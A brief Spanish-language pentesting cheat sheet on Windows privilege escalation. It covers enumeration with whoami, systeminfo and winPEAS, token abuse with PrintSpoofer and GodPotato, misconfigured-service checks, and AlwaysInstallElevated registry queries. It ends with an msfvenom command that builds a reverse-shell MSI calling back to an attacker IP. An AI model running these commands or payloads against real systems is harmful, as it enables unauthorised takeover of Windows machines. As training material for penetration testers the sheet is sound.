Escalada de Privilegios
Escalada en Windows
Vectores de privesc en Windows — privilegios de token, servicios mal configurados, AlwaysInstallElevated y enumeración.
1 min de lectura
Enumeración
whoami /priv
whoami /groups
systeminfoAutomatiza con winPEAS o PowerUp.ps1.
Privilegios de token
SeImpersonatePrivilege permite escaladas tipo Potato:
.\PrintSpoofer.exe -i -c cmd
.\GodPotato.exe -cmd "cmd /c whoami"Servicios mal configurados
Servicios con permisos de escritura o rutas sin comillas:
sc qc nombreServicio
accesschk.exe -uwcqv "Everyone" *AlwaysInstallElevated
Si ambas claves están a 1, cualquier .msi se instala como SYSTEM:
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f msi -o evil.msi